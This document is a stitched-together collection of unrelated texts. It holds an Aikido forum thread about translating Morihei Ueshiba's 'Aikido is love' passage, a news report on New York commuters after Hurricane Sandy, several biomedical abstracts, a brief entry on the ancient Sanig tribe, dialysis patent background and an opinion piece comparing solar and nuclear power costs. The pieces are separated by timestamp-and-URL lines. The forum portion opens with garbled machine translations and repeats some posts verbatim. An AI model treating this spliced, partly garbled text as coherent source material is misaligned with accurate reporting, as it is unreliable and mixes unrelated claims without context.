"If Taekwondo designates the heart of love either heaven and earth as our heart from here and large mind of universal protection very from here completing the mission of oneself it is not the road of the military affairs, is not, Taekwondo it strikes in oneself and wins and does the enemy and heartlessly the mustard which fights, the road of the absolute self completion which loses no and the enemy itself or, military affairs skill moves law of the heaven to the body and reaches to the supreme boundary of body and soul one body to be skill, it is distance."
I put my right foot in, I put my left foot out, I do the Aikipokey and throw you all about
"If the combination air heart of love either heaven and earth is designated as っ て our heart from here and large mind of universal protection very from here completing the mission of っ て oneself it is not the road of the military affairs, is not, the combination air it strikes in oneself and wins and does the enemy and heartlessly the mustard which fights む, the road of the absolute self completion which loses no and the enemy itself or, 而, military affairs skill moves law of the heaven to the body and reaches to the supreme boundary of body and soul one body to be skill, it is distance"
I don't read Japanese, so I can't tell you if it's a good translation.
Thanks to all the many people who have replied in regard to this quest!
Jason Wotherspoon and cbateman found the exact translation I was looking for, so special thanks to them both.
For those interested:
Aikido is love. You make this great great love of the universe your heart and then you must make your own mission the protection and love of all things. To accomplish this mission must be the true budo. True budo means to win over yourself and eliminate the fighting spirit of the enemy…No, it is a way to absolute self/perfection, in which the very enemy is eliminated. The technique of Aiki is ascetic training and a way through which you reach a state of unification of body and spirit by the principle of heaven.
Aikido is love. You make this great great love of the universe your heart and then you must make your own mission the protection and love of all things. To accomplish this mission must be the true budo. True budo means to win over yourself and eliminate the fighting spirit of the enemy…No, it is a way to absolute self/perfection, in which the very enemy is eliminated. The technique of Aiki is ascetic training and a way through which you reach a state of unification of body and spirit by the principle of heaven.
I am translating a text from Japanese in which the text by O-Sensei which starts with "Aikido is love..." is included. I know it must be translated into English somewhere, and probably in a better version than I can create!
I have heard that it may be in one of the old Aiki Journal editions from around 1974-75. If anyone has the DVDs with these editions on them, and can find the text, could you help me, please?
The text may also be in one of the many Aikido books out there, I just can't find it in any of the ones I have.
For those who can read Japanese, the text goes:
"合気とは愛なり、天地の心を以って我が心とし、万有愛護の大精神を以って自己の使命を完遂する事こそ武の道であらねばならぬ、合気とは自己に打ち克ち敵をして戦う心なか らしむ、否、敵そのものを無くする絶対的自己完成の道なり、而して武技は天の理法を身体に移し霊肉一体の至上境に至るの技であり、道程である"
Any help would be greatly appreciated!
Onegaishimasu!
In Aiki,
Ethan Weisgard
Very nice. I appreciateyou posting this,
Justin
A secret of internal strength?:
"Let your weight from the crotch area BE in his hands."
For those interested, I thought I'd throw in a rough translation of this
first let's break it up into parts
"合気とは愛なり"
Aiki is Love! ( oh man, there's that word again)
"天地の心を以って我が心とし"
I make my heart the heart of heaven and earth.
<commentary>
In this case heart can refer to "feeling". As in the core of his physical being is related to the "up-down/heaven-earth" relation. Refers to a physical feeling I'm guessing. Ark has no relation to Ueshiba, never has read this, but describes it in the same manner.
"万有愛護の大精神を以って自己の使命を完遂する事こそ武の道であらねばならぬ"
I recieve my mission from the Universal Spirit of Protection/Love/Care/Lovedovey, and the consummation of this is the ultimate goal of the Martial Way.
<commentary>
Anyone that can come up with a better translation, feel free to do so. I could state my opinoin, but it'd turn into a page long dialogue, most of it having to lay out why he talks like this, and lay parallels to bodyskill development. In short, it's not that important in the overall scheme.
Aiki is not about breaking down our inner enemy and "winning" against it. Rather, it is the ultimate way to complete oneself and erase the conception of "enemy" all together.
<Comments>
The fat and short of it, get rid of the conception of "enemy" all together, or "clashing" with an opponent. Again, typical of the developmental process in internal styles, not limited to just Ueshiba, Inc. This refers to a physical feeling when engaging the opponent, and isn't some half baked hippie mystical gobbley gook if you ask me. Others might have a different take on it.
"而して武技は天の理法を身体に移し霊肉一体の至上境に至るの技であり、道程である"
Martial technique is about making the Laws of Heaven one with body and soul, and a way to take the body and soul to the summits (of "insert whatever sounds inspiring to you")
<Commentary>
This probably refers to the natural harmonies governing the body, which you strengthen with internal connction, continue to train this, and there are no "limits".
For those interested, I thought I'd throw in a rough translation of this
first let's break it up into parts
"合気とは愛なり"
Aiki is Love! ( oh man, there's that word again)
"天地の心を以って我が心とし"
I make my heart the heart of heaven and earth.
<commentary>
In this case heart can refer to "feeling". As in the core of his physical being is related to the "up-down/heaven-earth" relation. Refers to a physical feeling I'm guessing. Ark has no relation to Ueshiba, never has read this, but describes it in the same manner.
"万有愛護の大精神を以って自己の使命を完遂する事こそ武の道であらねばならぬ"
I recieve my mission from the Universal Spirit of Protection/Love/Care/Lovedovey, and the consummation of this is the ultimate goal of the Martial Way.
<commentary>
Anyone that can come up with a better translation, feel free to do so. I could state my opinoin, but it'd turn into a page long dialogue, most of it having to lay out why he talks like this, and lay parallels to bodyskill development. In short, it's not that important in the overall scheme.
Aiki is not about breaking down our inner enemy and "winning" against it. Rather, it is the ultimate way to complete oneself and erase the conception of "enemy" all together.
<Comments>
The fat and short of it, get rid of the conception of "enemy" all together, or "clashing" with an opponent. Again, typical of the developmental process in internal styles, not limited to just Ueshiba, Inc. This refers to a physical feeling when engaging the opponent, and isn't some half baked hippie mystical gobbley gook if you ask me. Others might have a different take on it.
"而して武技は天の理法を身体に移し霊肉一体の至上境に至るの技であり、道程である"
Martial technique is about making the Laws of Heaven one with body and soul, and a way to take the body and soul to the summits (of "insert whatever sounds inspiring to you")
<Commentary>
This probably refers to the natural harmonies governing the body, which you strengthen with internal connction, continue to train this, and there are no "limits".
Thanks, Rob. That loose translation actually indicates a re-stating of the idea of the "order of the Universe" idea, which would be more traditional for a martial arts expert to do than to talk about "love" in the sense that we in the West mean it. In other words, if you look at it in your terms, he's really simply stating that his martial art fulfills the "orderliness", the "harmony" of the universal laws that is the cornerstone of the Chinese cosmology (which is used as a basis in the Japanese beliefs as well).
The problem in discussing the issue in front of people that don't have the kokyu and ki skills (i.e., they're just some "academic" things that are mentioned probably as rituals by the Asians, etc.), is that the idea of using kokyu/jin to "blend" with all incoming forces doesn't seem to be more than some academic maunderings.
To me, he is saying that he makes his heart/core/essence the standard "primal qi", which is the combined "Ki of Heaven" and "Ki of Earth".... combining the qi of heaven and earth is the cornerstone concept for the "internal" jin/kokyu/ki development. Using that core, he has no need to conflict because any incoming attack is simply accepted into one's own circumstances, rather than fought against. If there are no conflicts because you "aiki" everything that comes into contact with your sphere, then there are no "enemies".
So I agree that this is more a discussion about what you can train, physically, to do with this wondrous combination of "the ki of heaven and earth", than it is a ministerial exhortation to love all things and then there are no enemies. This actually sort of feeds into my comments about some translators conveying ideas that are not necessarily reflective of the original intent of some of these classical writings. Ueshiba was at core a traditionalist; he would have made sure that whatever he espoused would have conformed with the accepted traditional ideas of the cosmology and the harmony with the natural laws of the cosmos.
I had a thought about this thread last night while showering. I disagree with the "Aikido is Love" in the syrupy sense which becomes spoken as a "philosophy" or as a behavioural mandate. Naturally, and tellingly, that makes some people angry because it is their pet belief. But let me lay out what I think is the larger alternative:
The idea of "aiki" is that there is no conflict... what goes wrong is that people hear "no conflict" to mean things like "there should only be love in this world and all conflict should be abjured", etc. In actuality, the idea of "no conflict" means that you never directly contend with any incoming attack and you make it a useful part of what you are doing within your own sphere of influence. This premise of "no conflict" is actually pretty widespread throughout Asian martial arts (but not completely, of course).
It's this bigger picture of using everything in a positive manner that is more of a key than the "love" part. The philosophy of the larger context is to train your body and your mind *first* and then apply (the emphasis is martial but to extend it beyond that *afterward* is OK and desireable, as I understand it) the "aiki" concept. In that sense, "aiki" is an instinctive harmony, not a "love", as nifty as that would sound.
Shioda, Sunadomari, Ueshiba Sensei, and others have all, at one time or another on filmclips, shown the ability to blend and bounce off an opponent with no real perceptible movement.... that's essential "aiki". Of course, it can be done with larger movements, too, and sometimes that is unavoidable, but the focus I would have is how these experts made their movements smaller and smaller to where the movements approach "stillness". At least that's the perspective I would suggest as a good one.
This text which you are translated is actually called "The Spirit of Aiki Manseido". It was recorded by Kanshu Sunadomari Sensei. I practiced at a Manseido Dojo for some time and we all had to recite it at the beginning of class. Here is the translation in English which can be found in Sunadomari Sensei's book, "Enlightenment through Aikido".
Aiki is love
It is the path that brings our hearts into oneness with the spirit of the universe to complete our mission in life by instilling in us a love and reverence for all of nature.
Aiki overcomes self. It not only takes hostility from our hearts but in making those who appear as enemies, enemies no more, it leads to absolute perfection of self.
This martial art, therefore, is the supreme way and call to unite our body and spirit under the laws of the universe.
I liked that book. A little on the philosophical side for my tastes, but still enjoyable. Strangely enough, I was reading it while in Paris, and got to train at a Iwama style dojo at the same time. Interesting mix...
Best,
Ron
Ron Tisdale
-----------------------
"The higher a monkey climbs, the more you see of his behind."
St. Bonaventure (ca. 1221-1274)
I disagree with the "Aikido is Love" in the syrupy sense which becomes spoken as a "philosophy" or as a behavioural mandate. Naturally, and tellingly, that makes some people angry because it is their pet belief.
I think it is more telling that people, such as yourself, view someone having a disagreement, a different take on things, as someone being angry.
If you disagree with aikido is love in the syrupy sense, then you probably disagree with Ueshiba. One can, of course, disagree with Ueshiba, nothing wrong with that, but going from direct quotes from his writings, and from the writings of Kiss. Ueshiba, and writings of others, love was certainly central in what you call the syrupy sense, not just not harming your attacker, but spreading peace and love to everyone.
One of many examples (I can probably find at least a dozen):
"true budo is the way of great harmony and great love for all beings"
(p. 98, Spirit of Aikido)
Justin
A secret of internal strength?:
"Let your weight from the crotch area BE in his hands."
Ok, I understand that references have been stated as to Aikido's philosophical "deeper meaning", I am not doubting this & I don't want to get bogged down in semantics, nor I am I willing to say that Aikido, at heart, in its core functionality is an ineffective means of combat.
That said, with the afore mentioned Aikido is "love", then where is the justification for combat (which I am here defining as any non-cooperative exchanges, i.e. not playing w/ ya buddy's). What's the point, sure love is fine, but why spend a lifetime training "martial techniques"? Obviously it would be easier to find a mountain top & meditate. Yet, we of the Chinese our Japanese arts, find ourselves training self defense, for combative purposes. Even if you justify yourself as only interested in the movement, or the cooperative exercises (which is fine), these practices are still martial based & martial functional. Why not just mediate on love?
Please help me to understand
Moses
with the afore mentioned Aikido is "love", then where is the justification for combat (which I am here defining as any non-cooperative exchanges, i.e. not playing w/ ya buddy's). What's the point, sure love is fine, but why spend a lifetime training "martial techniques"?
As far as I can tell, this kind of talk began in the 1920s or early 30's, when OSensei survived a determined attack by a sword-wielding Naval officer. Maybe someone else can correct me on the details, but I am under the impression that this happened when he was teaching aikijujutsu at the Imperial Naval Academy of Japan. Apparently, one of the officers took umbrage at the casual way that Ueshiba avoided attacks and countered decisively. After the class, he challenged Ueshiba and came at him in the hold of a ship with a live sword.
Ueshiba avoided attack after attack from this enraged military man who was very good with the sword and intended to kill him, but found that he could not.
After this, Ueshiba went into a garden and took some water from the well. When he raised the dipper to his lips, he had a sudden revelation of oneness in the universe. He said that the sky split open and golden light filled the universe and he realized that the true nature of budo was love.
What is seldom pointed out in this story was that OSensei was, at that time (if I'm not mistaken) teaching the elite of the Japanese military to kill. He was still teaching daito ryu and his students were soon to be (if not already) deeply involved in the invasion of China and the rest of Asia. So what he was teaching was not the modern swirly, smiley kind of aikido in which, real love means that you fall down faster. His students were strong, heavy fighting men with experience in killing.
So how could he have equated budo with love?
To me, it is as I said in the thread on subtle shades of meaning in the Japanese language. The first purpose of the sword is to protect. If it goes too far, it enslaves, but the original purpose is to protect one's own family.
In that way, the sword is like fire. In the stove, it keeps us warm and cooks our food, but if it gets out of hand, it destroys our home.
OSensei's greater change occurred when he realized that Japan was losing the war. Indeed, in terms of musubi, it had already lost, as soon as it began. Many Japanese understood this and opposed the war, but incidents such as 2/26, when many government figures were murdered, silenced most of the opposition. Ueshiba, himself, had supported the war, but he soon enough saw that it was destroying Japan.
In those days, he went back to his old pursuit of farming and gradually changed his techniques to something less overtly deadly, more fundamentally protective, maybe. Perhaps more influenced by nurturing his plants, encouraging their life force to come out, cooperating with their nature to bring about support for himself and his family.
Maybe this was when he changed from seeing budo as "love" in "defending" his nation to "love" as in defending all the people of all the nations.
Anyway, to me, this ability to defend is based on a sword-like capacity to destroy. Through his deep and deadly training, OSensei became able to overcome any attack without having to resort to deadliness. But it was based on his ability to be deadly.
So I think we have to remember the serious need to be able to protect ourselves and our families against serious attempts to harm us and them. Yet we are supposed to extend that same protection to the attacker, himself, as a member of our own family, in humanity.
Unfortunately, modern training, without solid technical focus on serious attacks, seems to leave practitioners with a subconscious realization that they cannot really defend against "any" attack and they fantasize about how they would handle a "real" attack. And these fantasies tend to get pretty violent, from ripping out shoulders, shattering joints, breaking bones, clawing eyes, and trying to kill the attacker in any way possible. And these fantasies sometimes come out in the dojo when a nage becomes frightened of attacks that come too close for comfort. Rather than seeing this as a sign of their own lack of technique, they perceive it as uke's "trying" to hurt them (even if the technique does not touch them) and they respond with harsh technique or atemi when it is not necessary. I suppose we've all felt some of this.
Well, the old way provides tested and sure ways to kill the attacker at a single stroke. Training with that in mind, it is not necessary to resort to violent fantasies and we can concentrate on doing techniques safely without injuring our partners in the dojo. And if we see ourself as the one most likely to get us into a bad situation, and work mostly on refining ourself through hard and serious technical practice, it becomes much easier to view attackers as misdirected and confused people and treat them with compassion and love--even if it is rather tough love.
For me, the most recent experience of this kind of thing came one day when I was riding my bike near a public park where my wife sometimes took our little boy. I noticed some people fighting in the children's play area. I pulled up near them and saw a young bum on top of an older bum, in the mount position, pounding down on the older guy's head. And then I noticed that the fighters were surrounded by six or eight other bums, watching from the benches.
I pulled up beside the play area and barked at the guy on top of the other guy: "Get off him! NOW!"
He looked shocked, but got up. The older man got off the ground, looking indignant at the man who had been beating him. The other bums looked at me, but didn't say anything.
I rode across the park to a restaurant, went inside and asked them to call the police to come to stop the fighting in the park. I guess the bums all took off. I didn't wait to see but went on home.
To me, that was protecting everyone without fighting.
Another time, I was approached by a "bum" in his twenties--a big, healthy-looking guy who wanted money. The only other person nearby was an older Chinese lady and I figured if I didn't engage the bum he would go after the Chinese lady. So I walked up and let him talk to me. He asked for a dollar. I took out my wallet and let him see that I had more than one dollar in it, but took out one dollar and gave it to him. I wanted to see if he would try to take the rest of the money. He didn't.
I finally decided that the best way to protect my own family was to move them out of that neighborhood. We now live in a nice little neighborhood. So that, again, is protecting without fighting.
I also think that if you train hard and seriously enough, with real technique rather than symbollic movement, it's not necessary even to think in terms of harming an attacker. And when you have done that, the would-be attacker finds it difficult even to think of attacking.
And there you have a full ni-en dama's worth of opinion.
Best wishes.
David
"That which has no substance can enter where there is no room."
Lao Tzu
Moses, maybe because once you have these skills (kokyu) then what you use them for is extremely important. If you use them in the spirit of love, they become constructive assets to society. The fact that the faces of the Kongorikishi are stored behind this face of love is vital too, else you do not have the power to put yourself at work in the spirit of love. This is the same as the idea of the sword that gives life, not the sword that destroys. It does not mean that there is no violence or no death, it means the spirit of every action is guided by a constructive desire. I suspect you cannot do this if you are so weak that every action is determined merely by self-preservation. Remember if you have better aiki (in most cases your opponent will not have any, since the training is secret :lol, you can determin the outcome, your opponent cannot overcome you.
Thanks for the alternative translation. I am looking forward to having a little more time to go deeper into it. There are a lot of O-Sensei's texts that have been translated a long time ago, and it is great to take a second look at them.
It is also wonderful the way that people's responses point in so many interesting directions regarding the interpretation of the meaning behind the words.
In my opinion, in our Western cultures there is a very sort of clear division between the touchy-feely, warm and fuzzy faction and then the rough and ready. blood and guts and veins in your teeth faction when dealing with the more spiritual aspects of O-Sensei's words. Where I come from, having grown up with the group of wonderful instructors from the old Iwama Dojo, with Saito Morihiro Sensei as my teacher, and now having a close relationship with Isoyama Sensei, Inagaki Sensei, Hirosawa Sensei and Nemoto Sensei, I am very privileged to see that the rough and ready aspects of these gentlemen in terms of their physical attitude in Aikido finds a wonderful counterpart in their very serious belief in practicing the spiritual teachings of the Founder. The best of both worlds - boo rah!
If you're talking to me, I have to note that while I made some comments, I didn't do any of the translating.
Quote:
In my opinion, in our Western cultures there is a very sort of clear division between the touchy-feely, warm and fuzzy faction and then the rough and ready. blood and guts and veins in your teeth faction when dealing with the more spiritual aspects of O-Sensei's words.
Well, I'm sort of in the middle. There is a quite beautiful and immutable logic that governs the whole net of ki, kokyu, kiai, Misogi-breathing, "ki tests", "ki of heaven; ki of earth", etc., etc. It's like a beautiful gem. I'm interested more in the body skills supported by that logic and the personal strength and health aspects. The philosophy and the "martial prowess" stuff doesn't interest me very much; it's just coincidence that I'm large and have a lot of martial background.
Sorry, I thought you had done the translation.
I respect your comments for their insight. I myself have been somewhere in the middle, regarding the different ways of relating to Aikido. I find that coming from a "hard-style" background, as I get older, I find myself moving more towards the inner workings of Aikido , but without letting go at all of the importance, in my opinion, of Aikido as a martial art. ( I just can't train as hard as I used to! )
Saito Sensei was very adamant about keeping Aikido - in its physical form - as a realistic and logical budo, as he had learned it from O-Sensei. But as the other Sensei from the Iwama Dojo make a clear point of, it would be a shame if all of O-Sensei's deeper thoughts and intentions for what Aikido can be used as, were not put into use. If we don't try to apply the spiritual sides of the principles that are adherent in the techniques of Aikido in our daily life, then we might as well just train some kind of sport.
Where I come from, having grown up with the group of wonderful instructors from the old Iwama Dojo, with Saito Morihiro Sensei as my teacher, and now having a close relationship with Isoyama Sensei, Inagaki Sensei, Hirosawa Sensei and Nemoto Sensei, I am very privileged to see that the rough and ready aspects of these gentlemen in terms of their physical attitude in Aikido finds a wonderful counterpart in their very serious belief in practicing the spiritual teachings of the Founder. The best of both worlds - boo rah!
Yes, I know exactly what you mean. One of my closest friends is Iwabe sensei who was the doshu's personal uke explained things that were just out of this world. When I grabbed his wrist, it was as if I could feel the power of the whole universe including Pluto come through his fingertips. On occasion, I even drank sake with doshu and I learned the true spirituality of it all.
I now practice at my own dojo, given the menkyo shou about one year ago. I am sure o sensei would be proud that we can still be rough and ready and full of love and laughs.
"万有愛護の大精神を以って自己の使命を完遂する事こそ武の道であらねばならぬ"
I recieve my mission from the Universal Spirit of Protection/Love/Care/Lovedovey, and the consummation of this is the ultimate goal of the Martial Way.
<commentary>
Anyone that can come up with a better translation, feel free to do so. I could state my opinoin, but it'd turn into a page long dialogue, most of it having to lay out why he talks like this, and lay parallels to bodyskill development. In short, it's not that important in the overall scheme.
Why would you say this concept is "not that important in the overall scheme?" | 2024-05-06T01:27:15.642919 | https://example.com/article/3305 |
Post-Sandy New York: Long, cold walks
NEW YORK -- His three-mile commute usually takes about 20 minutes by train, but with his subway line still down and buses overloaded in the wake of this week's punishing storm, Miguel Tiempos walked for more than an hour on a brisk, 45-degree Saturday morning, crossing over the windswept Williamsburg Bridge that connects Brooklyn to Manhattan.
“If I don’t go to work, I don’t get paid,” Tiempos said, his hands dug into the pockets of his cotton sweatshirt. “Maybe I lose my job.”
The night before, soon after power was restored to Manhattan's Lower East Side, Tiempo's boss called, saying he was expected Saturday at the Italian restaurant where he works as a cook. And so, like thousands of others throughout the New York metropolitan area still reeling from Hurricane Sandy, Tiempos was having to make do.
Electricity was restored to much of lower Manhattan on Friday night, and authorities expect that the remaining parts of the island will have power by the end of Saturday, but many New Yorkers continue to be hobbled by the aftermath of last week’s historic storm.
Businesses in Lower Manhattan were slowly reopening but long gas lines and overcrowded buses continued to hamper transit for many New Yorkers. By midday, 80% of the subway system had been restored, Gov. Andrew Cuomo said, including some of the under-river lines that are vital for commuters traveling to jobs in Manhattan from Brooklyn and Queens.
“This is a major step forward in the resumption of regular subway service in New York City,” Cuomo said. However, some subway lines remained closed and confusion reigned among commuters still struggling to understand the bus system. Many, like Tiempos, chose to walk as employers called them back to work in a reilluminated lower Manhattan.
“It would have taken two hours by train, so I figured this was better,” said Sarah Gerard, who walked about an hour to her job at a bookstore. A hat was pulled low over her face and her nose was runny from the long trek over the East River.
Con Edison, the utility, said Saturday morning that about 280,000 customers remained without power, most of them in New York’s outlying boroughs and northern suburbs. In Manhattan, just 5,800 people remained without power. | 2024-05-11T01:27:15.642919 | https://example.com/article/6762 |
DNA-mediated restoration of phenylalanine hydroxylase gene expression in enzyme-deficient derivatives of enzyme-constitutive mouse cell hybrids.
Phenylalanine hydroxylase (PH) gene expression is not extinguished in hybrids between PH- mouse A9 cells, or its neomycin-resistant derivative A9Neo-3, and PH+ mouse erythroleukemia (MEL) cells, PHC-3A, in contrast to its extinction in hybrids between A9Neo-3 and PH+ rat hepatoma cells, FT-2. Two different types of 6-thioguanine (TG) -resistant derivatives of these A9 X PHC-3A hybrids (LP), are generated in regard to PH gene expression. In regular growth medium supplemented with 10(-4) M TG (Tyr+/TG), TGr derivatives, all of which continue to express PH, occur with high frequency (approximately equal to 10(-3). In contrast, in tyrosine-deficient selective medium, supplemented with 10(-4) M TG (Tyr-/TG), no actively growing colonies are observed. Nevertheless, small colonies containing quiescent cells can be rescued by supplementing the medium with tyrosine. The rescued TGr clones do not express any detectable level of PH. Biochemical, hybridization, and cybridization analyses of one such rescued clone, LPTG-3, showed that these cells lack the regulatory factor capable of activating PH gene in PH- MEL cells. The PH- phenotype of LPTG-3 cells can be converted to the PH+ phenotype by transfection with restriction enzyme-digested or -undigested PHC-3A or mouse liver DNA. Therefore, these cells could be used to clone a fragment of DNA involved in PH gene regulation through DNA-mediated gene transfer methods. | 2024-02-03T01:27:15.642919 | https://example.com/article/3354 |
Sanigs
The Sanigs () were a tribe inhabiting Western Georgian/Abkhazia during antiquity. Their ethnic identity is obscure and is the subject of a controversy. According to Georgian sources they were of Georgian, rather than Northwest Caucasian stock. They are first attested in the works of Pliny, Arrian and Memnon of Heraclea. Some scholars consider them to be Zans (ancestors of Mingrelian and Laz peoples), while others maintain that they were proto-Svans. There is also a consideration that they may have been somewhat similar to the Zygii tribe. According to Arrian, they inhabited the area around Sebastopolis (modern Sukhumi). In favour of the Sanigs Kartvelian (either Zan or Svan) origin, it is important to mention some modern Georgian surnames such as: Sanikidze, Sanikiani, Sanigiani, Sanaia.
References
Category:Ancient peoples of Georgia (country)
Category:Tribes in Greco-Roman historiography | 2023-12-29T01:27:15.642919 | https://example.com/article/8402 |
adjective
usage
Although both consequential and consequent can refer to something which happens as the result of something else, consequent is more common in this sense in modern English: the new measures were put into effect, and the consequent protest led to the dismissal of those responsible | 2024-05-15T01:27:15.642919 | https://example.com/article/8596 |
TH17 cells are critical for skin-specific pathological injury in acute graft-versus-host disease.
Interleukin-17 (IL-17), which is important for host defens, has been implicated in autoimmune and chronic inflammatory diseases. As knockout mice lack IL-17 expression in δγT, NKT-like cells, studies investigating the association between TH17 cells and cutaneous graft-versus-host disease (GVHD) in animal models have reported conflicting results. To determine the role of TH17 cells in cutaneous GVHD, we developed an acute GVHD model using C57BL/6(H-2(b)) donors to BABL/c (H-2(d)) recipients. Blood samples and skin were examined for inflammation and infiltrating cells using histology and fluorescence-activated cell sorter (FACS) on days 6 and 15 after bone marrow transplantation. We found donor T cells to mediate severe cutaneous inflammation, which was ameliorater by administration of halofuginone (HF) to the recipients. Mechanistically, we demonstrate the severe tissue damage during this disorder to be associated with the production of IL-17 and the expansion of IL-17-producing CD4(+) cells. Specific inhibition of TH17 differentiation and function by HF reduced disease severity. Thus, TH17 cells are sufficient to induce acute cutaneous GVHD. | 2024-04-07T01:27:15.642919 | https://example.com/article/7268 |
Intervening Effects of Orthostatic Blood Pressure Change on Subcortical Atrophy and Cognition in De Novo and Drug-Naïve Parkinson's Disease.
Cognitive impairment and cardiovascular dysautonomia are two major non-motor features of Parkinson's disease (PD). They have been investigated separately and extensively, but their interactive outcomes have rarely been studied. The purpose of this study was to examine the association between central atrophy and cognition and to assess the influence of cardiovascular lability on this association in PD patients. Out of 151 early PD patients, 47 subjects were ultimately enrolled according to our selection criteria. Their cognitive status was examined by comprehensive neuropsychological tests assessing five domains of cognition. Supine and orthostatic blood pressures were recorded during head-up tilt tests, and orthostatic mean arterial pressure change was calculated. Every patient underwent brain magnetic resonance imaging, and intercaudate nucleus ratio was obtained as a central atrophy surrogate marker. The associations and interactions between central atrophy, cognition, and blood pressure variability were analyzed. Among 47 subjects, 20 (42.6%) had orthostatic hypotension. Attention/working memory, executive function, and delayed recall were inversely associated with central atrophy (r = -0.332, p = 0.028; r = -0.314, p = 0.038; r = -0.399, p = 0.024; respectively). In a multiple regression model, only attention/working memory was independently associated with central atrophy when modulated by orthostatic mean arterial pressure change (p < 0.05). This study revealed that cardiovascular dysautonomia interacted with the inverse association between cerebral atrophy and cognition, and it reinforced its relationship. Interaction between these two non-motor features should be kept in mind in clinical practice, particularly in PD patients with co-morbid vascular factors. | 2024-01-05T01:27:15.642919 | https://example.com/article/4802 |
06/27/2013
More Storms Tomorrow
The storms late last night and early this morning were strong, but didn't cause too many problems around the area. Just a handful of damage reports came in, primarily downed trees in the Shoals and near Fyffe in Dekalb County.
Here are a couple of damage pictures from Lauderdale County that were posted to WAFF.com.
If you can safely snap pictures of the weather or damage you can send them to us at pix@waff.com or tweet them to @waff48.
We'll stay quiet tonight, but more storms are expected tomorrow. Like last night's storms, some could be strong to severe. We are currently covered with a Slight Risk for severe weather Friday from the Storm Prediction Center in Norman, OK.
Once again, damaging wind gusts above 60mph are the primary threat. The stronger storms will also produce torrential downpours and could be prolific lightning producers. Some hail is also possible.
This should be mainly an afternoon storm event. WAFF 48 Pinpoint Predictor doesn't fire up storms until after lunchtime. Here's 3pm tomorrow:
Showers and storms are still around at 5pm:
There are indications that the storm activity will shift our south in time for your Friday evening plans. | 2024-04-19T01:27:15.642919 | https://example.com/article/9821 |
Most dialysis apparatus currently in use must be very rigorously cleaned between uses to prevent contamination, either cross-contamination from one fluid to another or contamination, with for example bacteria, due to poor sanitation. This is particularly important in haemodialysis, which comprises removing blood from the body, processing it by means of diffusion exchange through a membrane with a dialysis solution, and then returning it to the body. In attempt to reduce the amount of cleaning required, various methods and apparatus have been developed which utilize disposable single-use processing systems.
In these, and in other medical procedures employing disposable fluid processing systems, it is typical for the operator, who may be a trained medical professional, to first select and locate an appropriate filter or membrane element and one or more flow sets. These items must then be removed from their sterile packaging and be connected together to form a fluid circuit, which is then installed on the particular processing apparatus with which the procedure is to be performed. Typically, the processing apparatus includes multiple pump, valve, detection and clamping elements which interact with various parts of the disposable circuit and which are operable to perform the process.
Previous designs to simplify the set up of such processes have proposed that some of the fluid circuit elements be contained in a disposable “cartridge” which can be interfaced with a re-usable machine. Often these systems have been complex requiring either a disposable flexible bag-like circuit to be placed in a non-disposable rigid supporting structure prior to inserting into the machine or requiring tubes to be connected to various elements of a non-disposable component prior to interfacing with the machine. While these designs go some way to providing a solution to the cleaning problem, they are complex and there is scope for error in their use. In haemodialysis in particular, there are two fluid circuits, namely the blood circuit and the processing fluid (i.e. dialysis solution) circuit and while, in the prior proposals, the disposable component includes the full circuit for the blood, the processing fluid is supplied from a re-usable machine. The processing fluid is typically supplied to the cartridge in one of two ways. The first is that large volumes of the sterile process fluid, namely water, containing various additional components, for example sodium bicarbonate, is supplied to the machine. These volumes must be kept under specific conditions and can only be stored for a finite amount of time before bacterial growth begins. In addition, if different patients require the use of different processing fluids this does not provide a universal system. The alternative solution is that the machine is provided with a supply of de-ionised water (commonly in a medical establishment this will be produced centrally and then piped to applications requiring it). The water is then heated in the machine to a temperature at which bacteria are killed and then cooled down to substantially the same temperature as the bodily fluid and then various additives are added to provide the required process fluid. When the machine is dormant between uses with this system it is necessary to sterilize all of the internal fluid lines within the apparatus between uses and consequently, although the system hygiene is improved by the use of disposable parts and the set up is partially simplified for the operator, the down-time between treatments is not reduced because of the cleaning process that is still required. Further, the machine complexity has remained high because of the need to provide the chemical and circulatory fluid paths required for the cleaning process. | 2024-07-12T01:27:15.642919 | https://example.com/article/6735 |
We humans have been ranting about saving the planet for quite a while now. A significant fraction of our species wants us to cut down on the frankly scary amount of waste we spew into our atmosphere, while another economically-oriented fraction wants us to focus on meeting our enormous energy needs first.
Solar energy is a great way to go about generating clean energy. Even Tesla’s Gigafactory, poised to change the world, will be powered by this energy source. But there’s merit in the argument that you can’t have solar generating enough for all of us. Which is why, there’s nuclear power to look at. Nuclear power is a rockstar in the sense that it generates multiple times more power per unit input mass, and does pretty much as clean as any other source, provided waste disposal is done correctly.
Related: The Rise & Rise of SolarCity
So which one do we go for? Which power source will shape humanity’s future? Let’s look at the economics of both:
Solar energy costs just about 32 ¢/kWh right now. When measured with 20th century costs, this might look like a bargain. This is primarily possible because of government subsidies in virtually every country. Along with this, the swift decline in production costs of solar panels has assisted the cause. However, is it better than nuclear energy? Is solar energy the future?
Let us look closer to find what the future for humanity is.
Finances
Numbers play the game here.
Consider the two of most debated plants right now, Germany’s Solar PV and Finland’s Olkiluoto 3 Nuclear Plant. Germany’s Solar PV costs around 130 billion dollars while Finland’s Olkiluoto 3 costs only 31 billion dollars (considering a 20-year lifetime for both the plants). . The energy costs will be much lower as time passes but even after 20 years, nuclear power plant is cheaper.
Right now, solar energy costs about 32 ¢/kWh. On the other hand, nuclear energy costs about 7 ¢/kWh. The efficiency of a nuclear plant is in the region of 33%. A solar plant has an uninspiring 11-15% efficiency.
On an average, a nuclear plant has a 60-year lifetime. A solar plant has only 30-40 year lifetime. Initial investments are also low in nuclear power plants. Add to this, low maintenance costs of nuclear power plants.
Related: Nuclear Fusion – Persistently Decades Away
Finland’s Olkiluoto 3 produces 47 TWh more than Germany’s Solar PV over the course of 20 years. However, the lifetime electricity production of Germany’s Solar PV is higher than Finland’s Olkiluoto 3. This means that you get more electricity from solar plants in 40 years when compared with a nuclear plant operational for 60 years.
The myth that solar plants will become cheaper than nuclear plants in the next five years still exits. It is highly unlikely. To drop solar PV prices further, one has to go for a larger manufacturing scale.
Considering all the statistical data, it is much more profitable to produce electricity using a nuclear power plant.
All the statistics mentioned above are from thebreakthrough.org.
Adaptability
You might argue that, solar panels are much more versatile in contrast to a nuclear power plant. One gets to install the solar panels almost at any economically viable place that receives adequate amount of sunlight. Here is where a solar plant scores the most points. A small-scale solar plant is possible but a small-scale nuclear power plant is out of the equation right now. Touché.
Let us widen our gaze a bit here, consider Kudankulam Nuclear Power Plant in Koodankulam in the Tirunelveli district of Tamil Nadu. One unit of this nuclear power plant produces 1,000MW.
